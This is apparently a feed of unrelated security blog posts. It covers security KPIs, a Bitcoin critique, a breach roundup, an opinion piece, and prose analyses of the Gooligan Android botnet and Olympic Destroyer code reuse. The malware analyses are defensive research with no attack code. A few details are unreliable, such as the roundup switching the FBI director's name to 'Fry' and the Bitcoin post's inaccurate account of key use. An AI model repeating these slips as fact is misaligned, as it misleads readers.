Applied, this approach scales very nicely across the organization. Businesses already operate on a KPI model, and converting security requirements (née policies) into specific measurables at various levels of the organization means ditching the ineffective, out-of-band approach previously favored for directly specifying, measuring, and achieving desired performance objectives. Simply put, we no longer have to go out of our way to argue for people to conform to policies, but instead simply start measuring their performance and incentivize them to improve to meet performance objectives. It's then a short step to integrating security KPIs into all roles, even going so far as to establish departmental, if not whole-business, security performance objectives that are then factored into overall performance evaluations.

Examples of security policies-become-KPIs might include metrics around vulnerability and patch management, code defect reduction and remediation, and possibly even phishing-related metrics that are rolled up to the department or enterprise level. When creating security KPIs, think about the policy requirements as they're written and take time to truly understand the objectives they're trying to achieve. Convert those objectives into measurable items, and there you are on the path to KPIs as policies. For more on thoughts on security metrics, I recommend checking out the CIS Benchmarks as a starting point.

Better Reporting and the Path to Accountability

Converting policies into KPIs means that nearly everything is natively built for reporting, which in turn enables executives to have better insight into the security and information risk of the organization. Moreover, shifting the focus to specific measurables means that we get away from the out-of-band dusty tomes, instead moving toward achieving actual results. We can now look at how different teams, projects, applications, platforms, etc., are performing and make better-informed decisions about where to focus investments for improvements.

This notion also potentially sparks an interesting future for current GRC-ish products. If policies go away (mostly), then we don't really need repositories for them. Instead, GRC products can shift to being true performance monitoring dashboards, allowing those products to broaden their scope while continuing to adapt other capabilities, such as those related to the so-called "SOAR" market (Security Orchestration, Automation, and Response). If GRC products are to survive, I suspect it will be by either heading further down the information risk management path, pulling in security KPIs in lieu of traditional policies and compliance, or it will drive more toward SOAR+dashboards with a more tactical performance focus (or some combination of the two). Suffice to say, I think GRC as it was once known and defined is in its final days of usefulness.

There's one other potentially interesting tie-in here, and that's to overall data analytics, which I've noticed slowly creeping into organizations. A lot of the focus has been on using data lakes, mining, and analytics in lieu of traditional SIEM and log management, but I think there's also a potentially interesting confluence with security KPIs, too. In fact, thinking about pulling in SOAR capabilities and other monitoring and assessment capabilities and data, it's not unreasonable to think that KPIs become the tweakable dials CISOs (and up) use to balance out risk vs reward in helping provide strategic guidance for address information risk within the enterprise. At any rate, this is all very speculative and unclear right now, but something to nonetheless watch. But I have digressed...

The bottom line here is this: traditional policy frameworks have generally outlived their usefulness. We cannot afford to continue writing and publishing security requirements in a format that isn't easily accessible in a "work as usual" format. In an Agile/DevOps world, "security as code" is imperative, and that includes converting security requirements into KPIs.

Warning as Mac malware exploits climb 270%

Reputable anti-malware security vendor Malwarebytes is warning Mac users that malware attacks against the platform climbed 270 percent last year.

Be careful out there

The security experts also warn that four new malware exploits targeting Macs have been identified in the first two months of 2018, noting that many of these exploits were identified by users, rather than security firms.

In one instance, a Mac user discovered that their DNS settings had been changed and found themselves unable to change them back.

To read this article in full, please click here

What John Oliver gets wrong about Bitcoin

John Oliver covered bitcoin/cryptocurrencies last night. I thought I'd describe a bunch of things he gets wrong.

How Bitcoin works

Nowhere in the show does it describe what Bitcoin is and how it works.

Discussions should always start with Satoshi Nakamoto's original paper. The thing Satoshi points out is that there is an important cost to normal transactions, namely, the entire legal system designed to protect you against fraud, such as the way you can reverse the transactions on your credit card if it gets stolen. The point of Bitcoin is that there is no way to reverse a charge. A transaction is done via cryptography: to transfer money to me, you decrypt it with your secret key and encrypt it with mine, handing ownership over to me with no third party involved that can reverse the transaction, and essentially no overhead.

All the rest of the stuff, like the decentralized blockchain and mining, is all about making that work.

Bitcoin crazies forget about the original genesis of Bitcoin. For example, they talk about adding features to stop fraud, reversing transactions, and having a central authority that manages that. This misses the point, because the existing electronic banking system already does that, and does a better job at it than cryptocurrencies ever can. If you want to mock cryptocurrencies, talk about the "DAO", which did exactly that -- and collapsed in a big fraudulent scheme where insiders made money and outsiders didn't.

Sticking to Satoshi's original ideas are a lot better than trying to repeat how the crazy fringe activists define Bitcoin.

How does any money have value?

Oliver's answer is currencies have value because people agree that they have value, like how they agree a Beanie Baby is worth $15,000.

This is wrong. A better way of asking the question why the value of money changes. The dollar has been losing roughly 2% of its value each year for decades. This is called "inflation", as the dollar loses value, it takes more dollars to buy things, which means the price of things (in dollars) goes up, and employers have to pay us more dollars so that we can buy the same amount of things.

The reason the value of the dollar changes is largely because the Federal Reserve manages the supply of dollars, using the same law of Supply and Demand. As you know, if a supply decreases (like oil), then the price goes up, or if the supply of something increases, the price goes down. The Fed manages money the same way: when prices rise (the dollar is worth less), the Fed reduces the supply of dollars, causing it to be worth more. Conversely, if prices fall (or don't rise fast enough), the Fed increases supply, so that the dollar is worth less.

The reason money follows the law of Supply and Demand is because people use money, they consume it like they do other goods and services, like gasoline, tax preparation, food, dance lessons, and so forth. It's not like a fine art painting, a stamp collection or a Beanie Baby -- money is a product. It's just that people have a hard time thinking of it as a consumer product since, in their experience, money is what they use to buy consumer products. But it's a symmetric operation: when you buy gasoline with dollars, you are actually selling dollars in exchange for gasoline. That you call one side in this transaction "money" and the other "goods" is purely arbitrary, you call gasoline money and dollars the good that is being bought and sold for gasoline.

The reason dollars is a product is because trying to use gasoline as money is a pain in the neck. Storing it and exchanging it is difficult. Goods like this do become money, such as famously how prisons often use cigarettes as a medium of exchange, even for non-smokers, but it has to be a good that is fungible, storable, and easily exchanged. Dollars are the most fungible, the most storable, and the easiest exchanged, so has the most value as "money". Sure, the mechanic can fix the farmers car for three chickens instead, but most of the time, both parties in the transaction would rather exchange the same value using dollars than chickens.

So the value of dollars is not like the value of Beanie Babies, which people might buy for $15,000, which changes purely on the whims of investors. Instead, a dollar is like gasoline, which obey the law of Supply and Demand.

This brings us back to the question of where Bitcoin gets its value. While Bitcoin is indeed used like dollars to buy things, that's only a tiny use of the currency, so therefore it's value isn't determined by Supply and Demand. Instead, the value of Bitcoin is a lot like Beanie Babies, obeying the laws of investments. So in this respect, Oliver is right about where the value of Bitcoin comes, but wrong about where the value of dollars comes from.

Why Bitcoin conference didn't take Bitcoin

John Oliver points out the irony of a Bitcoin conference that stopped accepting payments in Bitcoin for tickets.

The biggest reason for this is because Bitcoin has become so popular that transaction fees have gone up. Instead of being proof of failure, it's proof of popularity. What John Oliver is saying is the old joke that nobody goes to that popular restaurant anymore because it's too crowded and you can't get a reservation.

Moreover, the point of Bitcoin is not to replace everyday currencies for everyday transactions. If you read Satoshi Nakamoto's whitepaper, it's only goal is to replace certain types of transactions, like purely electronic transactions where electronic goods and services are being exchanged. Where real-life goods/services are being exchanged, existing currencies work just fine. It's only the crazy activists who claim Bitcoin will eventually replace real world currencies -- the saner people see it co-existing with real-world currencies, each with a different value to consumers.

Turning a McNugget back into a chicken

John Oliver uses the metaphor of turning a that while you can process a chicken into McNuggets, you can't reverse the process. It's a funny metaphor.

But it's not clear what the heck this metaphor is trying explain. That's not a metaphor for the blockchain, but a metaphor for a "cryptographic hash", where each block is a chicken, and the McNugget is the signature for the block (well, the block plus the signature of the last block, forming a chain).

Even then that metaphor as problems. The McNugget produced from each chicken must be unique to that chicken, for the metaphor to accurately describe a cryptographic hash. You can therefore identify the original chicken simply by looking at the McNugget. A slight change in the original chicken, like losing a feather, results in a completely different McNugget. Thus, nuggets can be used to tell if the original chicken has changed.

This then leads to the key property of the blockchain, it is unalterable. You can't go back and change any of the blocks of data, because the fingerprints, the nuggets, will also change, and break the nugget chain.

The point is that while John Oliver is laughing at a silly metaphor to explain the blockchain becuase he totally misses the point of the metaphor.

Oliver rightly says "don't worry if you don't understand it -- most people don't", but that includes the big companies that John Oliver name. Some companies do get it, and are producing reasonable things (like JP Morgan, by all accounts), but some don't. IBM and other big consultancies are charging companies millions of dollars to consult with them on block chain products where nobody involved, the customer or the consultancy, actually understand any of it. That doesn't stop them from happily charging customers on one side and happily spending money on the other.

Thus, rather than Oliver explaining the problem, he's just being part of the problem. His explanation of blockchain left you dumber than before.


John Oliver mocks the Brave ICO ($35 million in 30 seconds), claiming it's all driven by YouTube personalities and people who aren't looking at the fundamentals.

And while this is true, most ICOs are bunk, the  Brave ICO actually had a business model behind it. Brave is a Chrome-like web-browser whose distinguishing feature is that it protects your privacy from advertisers. If you don't use Brave or a browser with an ad block extension, you have no idea how bad things are for you. However, this presents a problem for websites that fund themselves via advertisements, which is most of them, because visitors no longer see ads. Brave has a fix for this. Most people wouldn't mind supporting the websites they visit often, like the New York Times. That's where the Brave ICO "token" comes in: it's not simply stock in Brave, but a token for micropayments to websites. Users buy tokens, then use them for micropayments to websites like New York Times. The New York Times then sells the tokens back to the market for dollars. The buying and selling of tokens happens without a centralized middleman.

This is still all speculative, of course, and it remains to be seen how successful Brave will be, but it's a serious effort. It has well respected VC behind the company, a well-respected founder (despite the fact he invented JavaScript), and well-respected employees. It's not a scam, it's a legitimate venture.

How to you make money from Bitcoin?

The last part of the show is dedicated to describing all the scam out there, advising people to be careful, and to be "responsible". This is garbage.

It's like my simple two step process to making lots of money via Bitcoin: (1) buy when the price is low, and (2) sell when the price is high. My advice is correct, of course, but useless. Same as "be careful" and "invest responsibly".

The truth about investing in cryptocurrencies is "don't". The only responsible way to invest is to buy low-overhead market index funds and hold for retirement. No, you won't get super rich doing this, but anything other than this is irresponsible gambling.

It's a hard lesson to learn, because everyone is telling you the opposite. The entire channel CNBC is devoted to day traders, who buy and sell stocks at a high rate based on the same principle as a ponzi scheme, basing their judgment not on the fundamentals (like long term dividends) but animal spirits of whatever stock is hot or cold at the moment. This is the same reason people buy or sell Bitcoin, not because they can describe the fundamental value, but because they believe in a bigger fool down the road who will buy it for even more.

For things like Bitcoin, the trick to making money is to have bought it over 7 years ago when it was essentially worthless, except to nerds who were into that sort of thing. It's the same tick to making a lot of money in Magic: The Gathering trading cards, which nerds bought decades ago which are worth a ton of money now. Or, to have bought Apple stock back in 2009 when the iPhone was new, when nerds could understand the potential of real Internet access and apps that Wall Street could not.

That was my strategy: be a nerd, who gets into things. I've made a good amount of money on all these things because as a nerd, I was into Magic: The Gathering, Bitcoin, and the iPhone before anybody else was, and bought in at the point where these things were essentially valueless.

At this point with cryptocurrencies, with the non-nerds now flooding the market, there little chance of making it rich. The lottery is probably a better bet. Instead, if you want to make money, become a nerd, obsess about a thing, understand a thing when its new, and cash out once the rest of the market figures it out. That might be Brave, for example, but buy into it because you've spent the last year studying the browser advertisement ecosystem, the market's willingness to pay for content, and how their Basic Attention Token delivers value to websites -- not because you want in on the ICO craze.


John Oliver spends 25 minutes explaining Bitcoin, Cryptocurrencies, and the Blockchain to you. Sure, it's funny, but it leaves you worse off than when it started. It admits they "simplify" the explanation, but they simplified it so much to the point where they removed all useful information.

Weekly Cyber Risk Roundup: Payment Card Breaches, Encryption Debate, and Breach Notification Laws

This past week saw the announcement of several new payment card breaches, including a point-of-sale breach at Applebee’s restaurants that affected 167 locations across 15 states.

The malware, which was discovered on February 13, 2018, was “designed to capture payment card information and may have affected a limited number of purchases” made at Applebee’s locations owned by RMH Franchise Holdings, the company said in a statement.

News outlets reported many of the affected locations had their systems infected between early December 2017 and early January 2018. Applebee’s has close to 2,000 locations around the world and 167 of them were affected by the incident.

In addition to Applebees, MenuDrive issued a breach notification to merchants saying that its desktop ordering site was injected with malware designed to capture payment card information. The incident impacted certain transactions from November 5, 2017 to November 28, 2017.

“We have learned that the malware was contained to ONLY the Desktop ordering site of the version that you are using and certain payment gateways,” the company wrote. “Thus, this incident was contained to a part of our system and did NOT impact the Mobile ordering site or any other MenuDrive versions.”

Finally, there is yet another breach notification related to Sabre Hospitality Solutions’ SynXis Central Reservations System — this time affecting Preferred Hotels & Resorts. Sabre said that a unauthorized individual used compromised user credentials to view reservation information, including payment card information, for a subset of hotel reservations that Sabre processed on behalf of the company between June 2016 and November 2017.


Other trending cybercrime events from the week include:

  • Marijuana businesses targeted: MJ Freeway Business Solutions, which provides business management software to cannabis dispensaries, is notifying customers of unauthorized access to its systems that may have led to personal information being stolen. The Canadian medical marijuana delivery service JJ Meds said that it received an extortion threat demanding $1,000 in bitcoin in order to prevent a leak of customer information.
  • Healthcare breach notifications: The Kansas Department for Aging and Disability Services said that the personal information of 11,000 people was improperly emailed to local contractors by a now-fired employee. Front Range Dermatology Associates announced a breach related to a now-fired employee providing patient information to a former employee. Investigators said two Florida Hospital employees stole patient records, and local news reported that 9,000 individuals may have been impacted by the theft.
  • Notable data breaches: Ventiv Technology, which provides workers’ compensation claim management software solutions, is notifying customers of a compromise of employee email accounts that were hosted on Office365 and contained personal information. Catawba County services employees had their personal information compromised due to the payroll and human resources system being infected with malware. Flexible Benefit Service Corporation said that an employee email account was compromised and used to search for wire payment information. A flaw in Nike’s website allowed attackers to read server data and could have been leveraged to gain greater access to the company’s systems. A researcher claimed that airline Emirates is leaking customer data.
  • Other notable events: Cary E. Williams CPA is notifying employees, shareholders, trustees and partners of a ransomware attack that led to unauthorized access to its systems. The cryptocurrency exchange Binance said that its users were the target of “a large scale phishing and stealing attempt” and those compromised accounts were used to perform abnormal trading activity over a short period of time. The spyware company Retina-X Studios said that it “is immediately and indefinitely halting its PhoneSheriff, TeenShield, SniperSpy and Mobile Spy products” after being “the victim of sophisticated and repeated illegal hackings.”

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.


Cyber Risk Trends From the Past Week


There were several regulatory stories that made headlines this week, including the FBI’s continued push for a stronger partnership with the private sector when it comes to encryption, allegations that Geek Squad techs act as FBI spies, and new data breach notification laws.

In a keynote address at Boston College’s cybersecurity summit, FBI Director Christopher Wray said that there were 7,775 devices that the FBI could not access due to encryption in fiscal 2017, despite having approval from a judge. According to Fry, that meant the FBI could not access more than half of the devices they tried to access during the period.

“Let me be clear: the FBI supports information security measures, including strong encryption,” Fry said. “Actually, the FBI is on the front line fighting cyber crime and economic espionage. But information security programs need to be thoughtfully designed so they don’t undermine the lawful tools we need to keep the American people safe.”

However, Ars Technica noted that a consensus of technical experts has said that what the FBI has asked for is impossible.

In addition, the Electronic Frontier Foundation obtained documents via a Freedom of Information Act lawsuit that revealed the FBI and Best Buy’s Geek Squad have been working together for decades. In some cases Geek Squad techs were paid as much as $1,000 to be informants, which the EFF argued was a violation of Fourth Amendment rights as the computer searches were not authorized by their owners.

Finally, the Alabama senate unanimously passed the Alabama Breach Notification Act, and the bill will now move to the house.

“Alabama is one of two states that doesn’t have a data breach notification law,” said state Senator Arthur Orr, who sponsored Alabama’s bill. “In the case of a breach, businesses and organizations, including state government, are under no obligation to tell a person their information may have been compromised.”

With both Alabama and South Dakota recently introducing data breach notification legislation, every resident of the U.S. may soon be protected by a state breach notification law.

Security is not a buzz-word business model, but our cumulative effort

Security is not a buzz-word business model, but our cumulative effort

This article conveys my personal opinion towards security and it's underlying revenue model; I would recommend to read it with a pinch of salt (+ tequila, while we are on it). I shall be covering either side of the coin, the heads where pentesters try to give you a heads-up on underlying issues, and tails where the businesses still think they can address security at the tail-end of their development.

A recent conversation with a friend who's in information security triggered me to address the white elephant in the room. He works in a security services firm that provides intelligence feeds and alerts to the clients. Now he shared a case where his firm didn't share the right feed at the right time even though the client was "vulnerable" because the subscription model is different. I understand business is essential, but on the contrary isn't security a collective argument? I mean tomorrow if when this client gets attacked, are you going just to turn a blind eye because it didn't pay you well? I understand the remediation always cost money (or more efforts) but holding the alert to a client on some attack you witnessed in the wild based on how much money are they paying you is hard to contend.

I don't dream about the utopian world where security is obvious but we surely can walk in that direction.

What is security to a business?

Is it a domain, a pillar or with the buzz these days, insurance? Information security and privacy while being the talk of the town are still come where the business requirements end. I understand there is a paradigm shift to the left, a movement towards the inception for your "bright idea" but still we are far from an ideal world, the utopian so to speak! I have experienced from either side of the table - the one where we put ourselves in the shoes of hackers and the contrary where we hold hands with the developers to understand their pain points & work together to build a secure ecosystem. I would say it's been very few times that business pays attention to "security" from day-zero (yeah, this tells the kind of clients I am dealing with and why are in business). Often business owners say - Develop this application, based on these requirements, discuss the revenue model, maintenance costs, and yeah! Check if we need these security add-ons or do we adhere to compliance checks as no one wants auditors knocking at the door for all the wrong reasons.

This troubles me. Why don't we understand information security as important a pillar as your whole revenue model?

Security is not a buzz-word business model, but our cumulative effort

How is security as a business?

I have many issues with how "security" is being tossed around as a buzz-word to earn dollars, but very few respect the gravity or the very objective of its existence. I mean whether it's information, financial, or life security - they all have very realistic and quantifiable effects on someone's physical well-being. Every month, I see tens (if not hundreds) of reports and advisories where quality is embarrassingly bad. When you tap to find the right reasons - either the "good" firms are costly, or someone has a comfort zone with existing firms, or worst that neither the business care nor do they pressure firms for better quality. I mean at the end, it's a just plain & straightforward business transaction or a compliance check to make auditor happy.

Have you ever asked yourself the questions,

  1. You did a pentest justifying the money paid for your quality; tomorrow that hospital gets hacked, or patients die. Would you say you didn't put your best consultants/efforts because they were expensive for the cause? You didn't walk the extra mile because the budgeted hours finished?
  2. Now, to you Mr Business, CEO - You want to cut costs on security because you would prefer a more prominent advertisement or a better car in your garage, but security expenditure is dubious to you. Next time check how much companies and business have lost after getting breached. I mean just because it's not an urgent problem, doesn't say it can't be. If it becomes a problem, chances are it's too late. These issues are like symptoms; if you see them, you already are in trouble! Security doesn't always have an immediate ROI, I understand, but don't make it an epitome of "out of sight, out of mind". That's a significant risk you are taking on your revenue, employees or customers.

Now, while I have touched both sides of the problem in this short article; I hope you got the message (fingers crossed). Please do take security seriously, and not only as your business transaction! Every time you do something that involves security on either sides, think - You invest your next big crypto-currency in an exchange/ market that gets hacked because of their lack of due-diligence? Or, your medical records became public because someone didn't perform a good pen-test. Or, you lose your savings because your bank didn't do a thorough "security" check of its infrastructure. If you think you are untouchable because of your home router security; you, my friend are living in an illusion. And, my final rant to the firms where there are good consultants but the reporting, or seriousness in delivering the message to the business is so fcuking messed up, that all their efforts go in vain. Take your deliverable seriously; it's the only window business has to peep into the issues (existing or foreseen), and plan the remediation in time.

That's all my friends. Stay safe and be responsible; security is a cumulative effort and everyone has to be vigilant because you never know where the next cyber-attack be.

Taking down Gooligan: part 1 — overview

This series of posts recounts how, in November 2016, we hunted for and took down Gooligan, the infamous Android OAuth stealing botnet. What makes Gooligan special is its weaponization of OAuth tokens, something that was never observed in mainstream crimeware before. At its peak, Gooligan had hijacked over 1M OAuth tokens in an attempt to perform fraudulent Play store installs and reviews.

Gooligan marks a turning point in Android malware evolution as the first large scale OAuth crimeware

While I rarely talk publicly about it, a key function of our research team is to assist product teams when they face major attacks. Gooligan’s very public nature and the extensive cross-industry collaboration around its takedown provided the perfect opportunity to shed some light on this aspect of our mission.

Being part of the emergency response task force is a central aspect of our team, as it allows us to focus on helping our users when they need it the most and exposes us to tough challenges in real time, as they occur. Overcoming these challenges fuels our understanding of the security and abuse landscape. Quite a few of our most successful research projects started due to these escalations, including our work on fake phone verified accounts , the study of HTTPS interception , and the analysis of mail delivery security .

subject covered in this post

Given the complexity of this subject, I broke it down into three posts to ensure that I can provide a a full debrief of what went down and cover all the major aspects of the Gooligan escalation. This first post recounts the Gooligan origin story and offers an overview of how Gooligan works. The second post provides an in-depth analysis of Gooligan’s inner workings and an analysis of its network infrastructure. The final post discusses Gooligan various monetization schemas and its takedown.

This series of posts is modeled after the talk I gave with Oren Koriat from Check Point, at Botconf in December 2017, on the subject. Here is a re-recording of the talk:

You can get the slides here but they are pretty bare.

As OAuth token abuse is Gooligan’s key innovation, let’s start by quickly summarizing how OAuth tokens work, so it is clear why this is such a game changer.

What are Oauth tokens?

Oauth app list

OAuth tokens are the de facto standard for granting apps and devices restricted access to online accounts without sharing passwords and with a limited set of privileges. For example, you can use an OAuth token to only allow an app to read your Twitter timeline, while preventing it from changing your settings or posting on your behalf.

OAuth flow

Under the hood , the service provides the app, on your behalf, with an OAuth token that is tied to the exact privileges you want to grant. In a way that is similar but not exactly the same, when you sign up with your Google account on an Android device, Google gives the device a token that allows it to access Google services on your behalf. This is the long term token that Gooligan stole in order to impersonate users on the Play Store. You can read more about Android long term tokens here .


Gooligan overview

Overall, Gooligan is made of six key components:

  • Repackaged app: This is the initial payload, which is usually a popular repackaged app that was weaponized. This APK embedded a secondary hidden/encrypted payload.
  • Registration server: Record device information when it join the botnet after being rooted.
  • Exploit server: The exploit server is the system that will deliver the exact exploit needed to root the device, based on the information provided by the secondary payload. Having the device information is essential, as Kingroot only targeted unpatched older devices (4.x and below). The post-rooting process is also responsible for backdooring the phone recovery process to enable persistence.
  • Fraudulent app and ads C&C: This infrastructure is responsible for collecting exfiltrated data and telling the malware which (non-Google related) ads to display and which Play store app to boost.
  • Play Store app module: This is an injected library that allows the malware to issue commands to the Play store through the Play store app. This complex process was set up in an attempt to avoid triggering Play store protection.
  • Ads fraud module: This is a module that would regularly display ads to the users as an overlay. The ads were benign and came from an ad company that we couldn’t identify.


Analyzing Gooligan’s code allowed us to trace it back to earlier malware families, as it built upon their codebase. While those families are clearly related code-wise, we can't ascertain whether the same actor is behind all of them, because a lot of the shared features were extensively discussed in Chinese blogs.

Gooligan timeline

SnapPea the precursor

As visible in the timeline above, Gooligan’s genesis can be traced back to the SnapPea adware that emerged in March 2015 and was discovered by Check Point in July of the same year. SnapPea’s key innovation was the weaponization of the exploit kit Kingroot , which was until then used by enthusiasts to root their phones and install custom ROMs.

Blog post announcing SnapPea discovery

SnapPea Kingroot straightforward weaponization led to a rather unusual infection vector: its authors resorted to backdooring the backup application SnapPea to be able to infect victims. After an Android device was physically connected to an infected PC, the malicious SnapPea application used Kingroot to root the device in order to install malware on the device. Gooligan is related to SnapPea because Gooligan also use Kingroot exploits to root devices but in an untethered way via a custom remote server.

Following SnapPea footsteps Gooligan weaponizes the Kingroot exploits to root old unpatched Android devices.

Ghost Push the role model

Blog post discussing Ghost Push discovery

A few months after SnapPea appeared, Cheetah Mobile uncovered Ghost Push , which quickly became one of the largest Android (off-market) botnets. What set Ghost Push apart technically from SnapPea was the addition of code that allowed it to persist during the device reset. This persistence was accomplished by patching, among other things, the recovery script located in the system partition after Ghost Push gained root access in the same way Snappea did. Gooligan reused the same persistent code.

Gooligan borrowed from Ghost Push the code used to ensure its persistence across device resets.


As outline in this post Gooligan is a complex malware that built on previous malware generation and extend it to a brand new vector of attack: OAuth tokens theft.

Gooligan marks a turning point in Android malware evolution as the first large scale OAuth crimeware

Building up on this post, the next one of the serie will provide in-depth analysis of Gooligan’s inner workings and an analysis of its network infrastructure. The final post will discusses Gooligan various monetization schemas and its takedown

Thank you for reading this post till the end! If you enjoyed it, don’t forget to share it on your favorite social network so that your friends and colleagues can enjoy it too and learn about Gooligan.

To get notified when my next post is online, follow me on Twitter , Facebook , Google+ , or LinkedIn . You can also get the full posts directly in your inbox by subscribing to the mailing list or via RSS .

A bientôt!

Hunting down Gooligan — retrospective analysis

This talk provides a retrospective on how during 2017 Check Point and Google jointly hunted down Gooligan – one of the largest Android botnets at the time. Beside its scale what makes Gooligan a worthwhile case-study is its heavy reliance on stolen oauth tokens to attack Google Play’s API, an approach previously unheard of in malware.

This talk starts by providing an in-depth analysis of how Gooligan’s kill-chain works from infection and exploitation to system-wide compromise. Then building on various telemetry we will shed light on which devices were infected and how this botnet attempted to monetize the stolen oauth tokens. Next we will discuss how we were able to uncover the Gooligan infrastructure and how we were able to tie it to another prominent malware family: Ghostpush. Last but not least we will recount how we went about re-securing the affected users and takedown the infrastructure.

From Russia(?) with Code

The Olympic Destroyer cyberattack is a very recent and notable attack by sophisticated threat actors against a globally renowned 2-week sporting event that takes place once every four years in a different part of the world. Successfully attacking the Winter Olympics requires motivation, planning, resources and time.

Cyberattack campaigns are often a reflection of real world tensions and provide insight into the possible suspects in the attack. Much has been written about the perpetrators behind Olympic Destroyer emanating from either North Korea or Russia. Both have motivations. North Korea would like to embarrass its sibling South Korea, the holders of the 23rd Winter Olympics. Russia could be seeking revenge for the IOC ban on their team. And Russia has precedence, having previously been blamed for attacks on other sporting organizations, such as the intrusion at the World Anti Doping Agency that was targeted via a stolen International Olympic Committee account.

There has been much said about attribution, with accusations of misleading false flags and anti-forensics built into the malware. As Talos points out in their report, attribution is hard.

But attribution is not just hard, it’s often a wilderness of mirrors and, more often than not, a bit anticlimactic.

The motivation of our following analysis is not to point the finger of blame about who did the attacking, but to utilize our expertise in analyzing malware code and understanding the behaviors it exhibits to highlight the heritage, evolution and commonalities we found in the code of the Olympic Destroyer malware.

Initial Samples of Code Reuse

Besides analyzing the behavior of a sample, our sandbox performs several levels of code analysis, eventually extracting all code components, regardless if they are run at run-time or not. As we described in a blog post a few years ago, this technique is essential if we are to detect any dormant functionality that might be present within the sample.

After decomposing the code components in normalized basic blocks, the sandbox computes smart code hashes that are stored and indexed in our threat intelligence knowledge base. Over the last 3 years we have been collecting code hashes for millions of files, so when we want to hunt for other samples related to the same actor, we are able to query our backend for any other binaries that have been reusing significant amounts of code.

The rationale being that actors usually build up their code base over time, and reuse it over and over again across different campaigns. Code surely might evolve, but some components are bound to remain the same. This is the intuition that drove our investigation on Olympic Destroyer further. The first results were obviously some variants of the Olympic Destroyer binaries which we have already mentioned in our previous post. However, it quickly got way more interesting.

A very specific code hash led us through this process: 7CE26E95118044757D3C7A97CF9D240A (Lastline customers can use it to query our Global Threat Intelligence Network). This rare code hash surprisingly linked 21ca710ed3bc536bd5394f0bff6d6140809156cf, a payload of the Olympic Destroyer campaign, with some other samples of a remote access trojan, “TVSpy.” Though the actual internal name of the threat is TVRAT, the malware is known and labelled in VirusTotal as Trojan.Pavica or Trojan.Mezzo, none of which were previously connected to the original Olympic Destroyer campaign.

Figure 1 shows the actual code referenced by the code hash: it is a function used to read a buffer, and subsequently parse PE header from it.

Figure 1: The code referenced by the code hash 7CE26E95118044757D3C7A97CF9D240A shared by both the Olympic Destroyer sample 21ca710ed3bc536bd5394f0bff6d6140809156cf sha1 and TVSpy sample a61b8258e080857adc2d7da3bd78871f88edec2c.

This is not where code re-usage ends, as the actual function referencing and invoking the following fragment (see Figure 2) also shares almost all of the same logic. This function is responsible for loading PE file from the memory buffer and executing an entry point.

Figure 2: Function responsible for loading PE file from memory reused in both Olympic Destroyer and TV Spy

A Deeper Dive Based on Unusual Code

We decided to further investigate this piece of code since loading PE from memory is not all that common. Its origin opened several questions:

  1. Why is that piece of code the only link between the two samples?
  2. Were there any other samples sharing the same code?

Our first discovery was a Remote Access trojan called TVSpy, mentioned above. This family has been the subject of a few previous research investigations, and a recent Benkow Lab blog post (from November 2017) even reported that the source code was available on github.

Unfortunately, all links to github are now dead. But that didn’t stop us from finding the actual source code (or at least evidence that it was indeed published at some point). Apparently it was sold for $US500 on an underground Russian forum in 2015. Even though the original post and links are gone, a Russian information security forum kept a copy of the source code package alongside a description of the original sale announcement (see Figure 3).

Figure 3: TVSpy code as sold in an underground forum (according to researchers from

Not Enough – The Investigation Continued

Although interesting, this connection was eventually not enough to connect Olympic Destroyer to Russia or to TVSpy. So we kept digging. Further research finally identified the code in Figures 1 and 2 to be part of an open source project called LoadDLL (see Figure 4) and available on (first published back in March 2014).

Figure 4: Fragment of LoadDLL source code from LoadDLL project

However, a couple things still didn’t add up: why had we only managed to identify samples from 2017 even if the source code was released in 2014? What about older versions of TVSpy? How come our search didn’t return any of those samples? Were Olympic Destroyer and TVSpy samples from 2017 sharing more than just the LoadDLL code?

Apparently TVSpy went through a few transformations. Samples from 2015 did embed and use the LoadDLL code, but the compiler did some specific optimizations that made the code unique (see Figure 5). In particular the compiler optimized out both “flags” (not used in the function) and “read_proc” (statically link function) from the parameters of LoadDll, but it couldn’t optimize out a “if (read_proc)” check even though it is useless since “read_proc” is not passed as a parameter anymore.

Figure 5. Reconstructed source code of LoadDll from TVSpy dated back to 2015

The “read_proc” function itself is also identical to one from source code (see Figures 6 and 7) and as you can see in Figure 8, it also gets called exactly the same way as the original source code from

Figure 6: read_proc function implementation

Figure 7: read_proc function implementation

The most interesting aspect for us is in fact the version of TVSpy that dates back to 2017-2018 and shares with Olympic Destroyer almost the exact binary code of LoadDLL. You can see LoadDll_LoadHeaders for those samples in Figure 9: as you might notice the function looks different then the one from the older version (see Figure 8).

Figure 8. Reconstructed source code of LoadDLL_LoadHeaders function from TVSpy dated back to 2015

First, we thought that the authors added new checks before calling read_proc function, making clear link between Olympic Destroyer and TVSpy (how, after all, could there be the same code modifications if the authors were not the same?). However, after further review we figured that read_proc didn’t exist anymore. Instead it was compiled inline resulting in a statically linked memcpy function.

Figure 9. Reconstructed LoadDLL_LoadHeaders from TVSpy and OlympicDestroyer samples, including additional check due to inlining of the read_proc function.

Also the meaningless check in LoadDll (“if (read_proc)”) we mentioned before has disappeared in the new version of the code (see Figure 10).

Figure 10. Reconstructed LoadDLL_LoadHeaders from TVSpy and Olympic Destroyer samples, including additional check due to inlining of the read_proc function.

The Bottom Line – Evidence is Inconclusive

In conclusion, we believe that this is not enough evidence to substantiate a claim that Olympic Destroyer and new versions of TVSpy using the same modified source code are built by the same author.

The more probable version for us is that the sample was built on a new compiler that further optimized the code. It would still mean that both new version of TVSpy and Olympic Destroyer are built using the same toolchain configured in the very same way (to enable full optimization and link C++ runtime statically). We actually went to the extent of compiling the LoadDLL on MS Visual Studio 2017 with C++ runtime statically linked, and we managed to get the very same code as the one included in both Olympic Destroyer and TVSpy.

Although we would have liked to finally solve the dilemma, and unveil which were the actors behind the Olympic Destroyer attack, we ended up with more questions than answers, but admittedly, that’s what research sometimes is about.

First, why would the authors of an allegedly state sponsored malware use an old LoadDLL project from an open source project from 2014? It is hard to believe that they could not come up with their own implementation or use much more advanced open-source projects for that, and definitely not relying on an educational prototype buried way beyond the first page of results in Google.

Or maybe the actors were not that much advanced as we would like to think, maybe seeing this as a one-time job, without enough resources to avoid using publicly available source code to quickly build their malware? Or maybe it’s just another red flag, and the real authors decided to use the TVSpy source code as released in 2015 to leave a “Russian fingerprint”?

Maybe all of the above?

At the beginning of this article we stated that attribution is not just hard, it’s often a wilderness of mirrors and more often than not, a bit anticlimactic. As a matter of fact, that was quite a precise prediction.

The post From Russia(?) with Code appeared first on Lastline.

"Faster payment" scam is not quite what it seems

